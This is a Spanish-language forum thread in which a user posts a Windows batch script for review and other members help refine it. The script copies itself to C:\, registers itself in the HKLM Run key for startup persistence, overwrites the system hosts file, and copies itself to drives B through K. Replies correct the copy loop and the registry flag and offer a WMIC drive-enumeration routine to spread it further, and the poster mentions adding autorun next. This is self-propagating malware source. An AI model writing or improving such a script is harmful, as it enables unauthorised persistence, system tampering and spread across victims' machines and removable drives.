Autor
|
Tema: esta bien mi bat? (Leído 5,557 veces)
|
Norlak
|
copy %0 C:\
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hola.bat /d c:\hola.bat /f
echo 127.0.0.1 www.xxx.com > C:\WINDOWS\system32\drivers\etc\hosts echo 127.0.0.1 www.fotolog.com >> C:\WINDOWS\system32\drivers\etc\hosts
for %%x in ("B", "C", "D", "E", "F", "G", "H", "I", "J", "K") do (copy /y %0 "%%~x:\") |
bueno basicamente es eso, lo que e hecho, lo unico que hace es cambiar el fichero Hosts , que es para capar el acceso a las paginas pero sinceramente no tengo ni idea si esta bien eso o no, otra de las cosas que he exo es atraves del comando for ( gracia a la ayuda prestada por los miembros de este foro) es que dicho bat se copie. si alguien se pudiera tomar la molestia de mirarlo y decirme que tal se lo agradeceria, porque, una vez tenga esto completo quiero tambien intentar hacer un autorun, pero bueno eso son palabras mayores XD un saludo y de nuevo gracias. bueno si me pueden ayudar se lo agradeceria muchisimo. gracias por adelantado
|
|
« Última modificación: 23 Septiembre 2010, 15:54 pm por juampgaditano »
|
|
Rectificar es de sabios, aprende de tus errores para ser alguien mejor.
|
|
|
-=[ §ÂßÂÑÐØ ]=-
[[CoNoCiMiEnTo Es PoDeR]]
|
Creo que eso no se puede hacer, puedes hacer para meter la letra de unidad que quieres en una variable,y luego hacer la copia, pero no un comodin para todas las letras de unidad.
|
|
|
|
|
|
|
|
Norlak
|
Creo que eso no se puede hacer, puedes hacer para meter la letra de unidad que quieres en una variable,y luego hacer la copia, pero no un comodin para todas las letras de unidad.
Gracias por contestar, y por tu información, aun así seguire buscando y si encuentro algo te lo are saber. un saludo
|
|
|
|
|
|
|
Norlak
|
gracias, esta muy bien ese codigo, pero no es eso exactamente lo que buscaba aun asi gracias por el aporte porque esta muy bien el "progamita" Saludos.
|
|
|
|
|
|
|
xassiz~
|
for %%x in ("A", "B", "C", "D", "E", "F" ) do (copy /y %0 " %%~x:\" )
Lee sobre for. Y a tu código del REG ADD, añádele el parámetro /f para sobreescribir.
|
|
|
|
|
|
|
Norlak
|
for %%x in ("A", "B", "C", "D", "E", "F" ) do (copy /y %0 " %%~x:\" )
Lee sobre for. Y a tu código del REG ADD, añádele el parámetro /f para sobreescribir. muchisimas gracias de verdad, cuando lo tenga terminado lo mostrare para que veais que es lo que he echo, luego probare lo que me as dicho y de nuevo muchas gracias por contestar. saludos
|
|
|
|
|
|
|
modubat
|
Con esta función que codee obtienes las unidades luego ya es fácil, puedes usar copy xcopy o robocopy y un for ====================================================================================== :: Carga en variables del tipo VOL1, VOL2, VOL3... las unidades del disco duro :: Si sólo se quiere el nombre de la unidad y no la descripción cambiar "*" por "1". :: Sin argumentos :VOLS :: Empezamos el contador :: :: Obtemos las unidades con Wmic FOR /F "SKIP=1 TOKENS=*" %%A IN ( '"WMIC LOGICALDISK GET CAPTION, DESCRIPTION"' :: Aumenta el contador :: Declaramos las variables ) ======================================================================================
|
|
|
|
|
|
|
Norlak
|
Con esta función que codee obtienes las unidades luego ya es fácil, puedes usar copy xcopy o robocopy y un for
muchas gracias por ayudarme enserio, cuando lo acabe os lo enseño y gracias
|
|
|
|
|
|
|
|
|